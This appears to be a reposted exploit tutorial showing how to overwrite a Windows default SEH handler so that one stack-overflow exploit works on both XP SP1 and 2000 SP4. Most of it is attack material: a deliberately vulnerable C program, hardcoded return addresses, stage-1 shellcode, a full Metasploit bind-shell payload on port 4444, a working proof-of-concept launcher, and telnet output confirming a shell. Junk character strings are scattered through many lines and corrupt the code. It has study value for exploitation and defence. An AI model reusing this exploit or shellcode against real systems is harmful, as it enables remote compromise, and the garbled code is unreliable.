Exploiting Default Exception Handler to Increase Exploit Sta

韩冰

The goal of this method is to create a stable exploit that will successfully exploit a buffer overflow vulnerability on multiple operating systems. Every windows application has a default exception handler that is located at the end of the stack. When exploiting a normal buffer overflow vulnerability we overwrite the return address but in this case we will continue overwriting the stack and overwrite the default exception handler as well.
5 Y4 N. B' P& {, z5 H
[Buf] <- Shellcode
9 N* c$ p: @$ H/ i4 @; i[Return Address] <- jmp register (for Windows XP sp1)
# m1 G6 z' w# C' R" O/ m[Various Stack Data] <- Junk
5 C, C* A  Z; @: f5 B7 ~9 H. d[Pointer To Next SEH] <- "\xEB\x06\xff\xff" jump 6 bytes forward
[SE Handler] <- jmp register (for Win2k sp4)
[Stage1 Shellcode] <- stage1 shellcode for win2k
& X7 ]; u/ e* w% M, `. H5 b% B
If the first return address (Windows XP SP1) is wrong an exception will occur and the default exception handler will be called (Windows 2000 SP4). Thus allowing us to create a stable exploit with two return addresses

Necessary Tools:
8 v& R+ A- m' n! z6 V- OllyDBG
  v+ p, u4 P! S  G. H- C/C++ Compiler
- nasm
( Y" J# d; T: ]- Sac

Vulnerable Code:
//lamebuf.c
#include<stdio.h>
* `; B( @1 I  Q& c#include<string.h>
& r  B+ P" f5 f" q2 p% @#include<windows.h>
' G% Y) d' R4 W- T" e. Kint main(int argc,char *argv[]){
# b/ A( j1 I, v6 ?5 I
$ ^* S' ^* W! A9 z* Y# D. dchar buf[512];
char buf1[1024]; // <- simulate a stack
6 B/ H6 i- ^1 U2 w1 g//DebugBreak();
: [4 K' D$ R' n. t( w) k6 j5 {/ E' E5 ^if (argc != 2){ return -1; }
4 ~! S1 o) Z6 x& O
, @0 }: N; z1 t; ]/ cstrcpy(buf,argv[1]);
return 0x0;
9 E1 z4 o* o2 L2 D/ r- b}
2 ~; M4 ~% y4 z1 z1 ]3 u8 Z9 H) a
Getting Started:
) w$ @" n! x: @3 uBefore writing the exploit, lets see what happens when we overflow this application with 1600 bytes. The application crashed in the following state of registers:

" W; W4 Y' P0 iEAX 00000000
$ l$ G) n: x0 |% W. A, \5 \) JECX 00321404
EDX 00414141
. V5 i# _+ `( w5 j3 x0 cEBX 7FFDF000
3 x0 ~+ [2 I- e% n  ^ESP 0012FF88 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
EBP 41414141
ESI 77D4595F
! U* L! Z* @3 D5 OEDI 77F59037 ntdll.77F59037
EIP 41414141

1 {! k+ b. {) f& k  vLets take a look at the stack and see what happened to the default exception handler:
9 }3 _. P8 g0 ^8 f" n" |0x0012FFB0 41414141 Pointer to next SEH Record
0x0012FFB4 41414141 SE Handler
8 d9 x) {2 B. d; i. M
We successfully overwrote the return address and the default exception handler.
% [# J( A$ S0 ]% G1 n( N
Primary Return Address (Windows XP SP1 EN):
The first return address will be called as in a normal stack overflow. We can see that esp points to user-input, we will use that as our first stage shellcode. The return address will be 0x77F8AC16 (jmp esp on Windows XP SP1 En), and our first stage shellcode will be:
"\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4"
: U) A5 T9 L8 `: |, ^% l
4 A' N* w4 p, a" X7 bSecondary Return Address (Windows 2000 SP4 EN):
+ e5 C; ?- A  D+ M% m5 }* KThe secondary return address will be called as in a normal SEH return. The return address will be 0x77F92A9B (jmp ebx on Win2k Sp4 En), and our first stage shellcode will be:
- h9 c: n% _) k6 H. P3 ^+ O"\x89\xC1\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE1"

Proof Of Concept:
// exploit.c
; V' U( o  X2 _- w  z// Tal zeltzer - [Double Return] //

% B) V. y2 `! ]) o2 p4 A0 }#include<stdio.h>
% {) D4 |6 K/ j% W6 O, K#include<string.h>
  k6 m" G0 a3 W9 z% ~#include<windows.h>

#define RET_XP 0x77F8AC16 // WinXP Sp1 English - jmp esp
  k) Z7 [* _6 ~1 M6 Q2 z2 R#define RET_WIN2K 0x77F92A9B // Win2k Sp4 English - jmp ebx

  i! }/ R& _! I/ `3 c' H( `// Stage1 For WinXP Sp1 English
unsigned char stage1_1[] = "\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4";

. P: t9 F8 B4 d  ^8 g! W! [// Stage1 For Win2k Sp4 English
unsigned char stage1_2[] = "\x89\xC1\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE1";
& q; h' x8 \+ \) D* k
// win32_bind - Encoded Shellcode [\x00\x0a\x09] [ EXITFUNC=seh LPORT=4444 Size=399 ] _blank>http://metasploit.com
unsigned char shellcode[] =
2 j  o% U& h) y8 i( q"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4f\x85"
"\x2f\x98\x83\xeb\xfc\xe2\xf4\xb3\x6d\x79\x98\x4f\x85\x7c\xcd\x19"
3 C7 R3 X0 H9 f0 K1 G* E"\xd2\xa4\xf4\x6b\x9d\xa4\xdd\x73\x0e\x7b\x9d\x37\x84\xc5\x13\x05"
"\x9d\xa4\xc2\x6f\x84\xc4\x7b\x7d\xcc\xa4\xac\xc4\x84\xc1\xa9\xb0"
+ I- |. \# u" N% A; Q! ]; ~9 F1 g"\x79\x1e\x58\xe3\xbd\xcf\xec\x48\x44\xe0\x95\x4e\x42\xc4\x6a\x74"
  ?7 K/ Y; F% w0 N2 g"\xf9\x0b\x8c\x3a\x64\xa4\xc2\x6b\x84\xc4\xfe\xc4\x89\x64\x13\x15"
"\x99\x2e\x73\xc4\x81\xa4\x99\xa7\x6e\x2d\xa9\x8f\xda\x71\xc5\x14"
"\x47\x27\x98\x11\xef\x1f\xc1\x2b\x0e\x36\x13\x14\x89\xa4\xc3\x53"
$ C; e( e3 v) Y, \2 k2 G"\x0e\x34\x13\x14\x8d\x7c\xf0\xc1\xcb\x21\x74\xb0\x53\xa6\x5f\xce"
"\x69\x2f\x99\x4f\x85\x78\xce\x1c\x0c\xca\x70\x68\x85\x2f\x98\xdf"
6 W" ?2 J8 U; _+ T  v" [+ t7 O& l" K"\x84\x2f\x98\xf9\x9c\x37\x7f\xeb\x9c\x5f\x71\xaa\xcc\xa9\xd1\xeb"
"\x9f\x5f\x5f\xeb\x28\x01\x71\x96\x8c\xda\x35\x84\x68\xd3\xa3\x18"
"\xd6\x1d\xc7\x7c\xb7\x2f\xc3\xc2\xce\x0f\xc9\xb0\x52\xa6\x47\xc6"
"\x46\xa2\xed\x5b\xef\x28\xc1\x1e\xd6\xd0\xac\xc0\x7a\x7a\x9c\x16"
9 I% t$ H" ~# v5 M"\x0c\x2b\x16\xad\x77\x04\xbf\x1b\x7a\x18\x67\x1a\xb5\x1e\x58\x1f"
"\xd5\x7f\xc8\x0f\xd5\x6f\xc8\xb0\xd0\x03\x11\x88\xb4\xf4\xcb\x1c"
/ z$ U2 d! @. j9 H( B"\xed\x2d\x98\x5e\xd9\xa6\x78\x25\x95\x7f\xcf\xb0\xd0\x0b\xcb\x18"
"\x7a\x7a\xb0\x1c\xd1\x78\x67\x1a\xa5\xa6\x5f\x27\xc6\x62\xdc\x4f"
"\x0c\xcc\x1f\xb5\xb4\xef\x15\x33\xa1\x83\xf2\x5a\xdc\xdc\x33\xc8"
+ M- {# t' D/ w/ Y"\x7f\xac\x74\x1b\x43\x6b\xbc\x5f\xc1\x49\x5f\x0b\xa1\x13\x99\x4e"
7 {; B- B  s" b"\x0c\x53\xbc\x07\x0c\x53\xbc\x03\x0c\x53\xbc\x1f\x08\x6b\xbc\x5f"
"\xd1\x7f\xc9\x1e\xd4\x6e\xc9\x06\xd4\x7e\xcb\x1e\x7a\x5a\x98\x27"
"\xf7\xd1\x2b\x59\x7a\x7a\x9c\xb0\x55\xa6\x7e\xb0\xf0\x2f\xf0\xe2"
; p2 F( d+ ^/ P! q$ d"\x5c\x2a\x56\xb0\xd0\x2b\x11\x8c\xef\xd0\x67\x79\x7a\xfc\x67\x3a"
  C9 u2 ~' ~( Q4 e"\x85\x47\x68\xc5\x81\x70\x67\x1a\x81\x1e\x43\x1c\x7a\xff\x98";
$ L& Q# e- @1 e4 V4 n; E
; A1 T' |$ Y( s$ [! u+ Y
int main(int argc,char *argv[]){

char *bufExe[3];
char buf[2048];
bufExe[0] = "lamebuf.exe";
" O- n# z  c" M& Q( fbufExe[2] = NULL;

memset(buf,0x0,sizeof(buf));
memset(buf,0x90,1652);
" A* v: j: P5 l0 I5 m% K4 vmemcpy(&buf[24],shellcode,sizeof(shellcode)-1);
* y9 d' R* b( R9 O5 d; \
memcpy(&buf[1544],&stage1_1,sizeof(stage1_1)-1); //WinXP SP1 En - Stage1 Shellcode
memcpy(&buf[1592],&stage1_2,sizeof(stage1_2)-1); //Win2k SP4 En - Stage2 Shellcode
3 S( L5 K8 D/ _& k3 j5 L. e7 r& v
*(unsigned long *)&buf[1540] = RET_XP; // First RET (jmp esp) winXP sp1 en
*(unsigned long *)&buf[1584] = 0xcccc06EB; // For win2k - jmp 6 bytes forward to our stage1_2 code
0 n3 [2 T& p2 q*(unsigned long *)&buf[1588] = RET_WIN2K; // Second RET (jmp ebx) win2k sp4 en

3 K" a* v* v. u( ?+ t
bufExe[1] = buf;
//Execute the vulnerable application
execve(bufExe[0],bufExe,NULL);

8 d7 {% ]3 @* Z' y; ireturn 0x0;
: C; ?: _/ e2 r% d}
# o/ X% M, v% Q( c. i& ]" b9 j
Exploit under Windows XP SP1:
% t: y. _0 N  l. b# `4 R4 I7 NC:\>exploit
C:\>
C:\>telnet 127.0.0.1 4444

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

  t9 E) [" g8 l9 }( |  [/ Y; w. `C:\>

Exploit under Windows 2000 SP4:
C:\>exploit
C:\>
9 e* e, ^& c+ _( w( K4 qC:\>telnet 127.0.0.1 4444
2 B# k$ _0 g% d0 g0 J
Microsoft Windows 2000 [Version 5.00.2195]
( q5 d( V" I8 y$ a(C) Copyright 1985-2000 Microsoft Corp.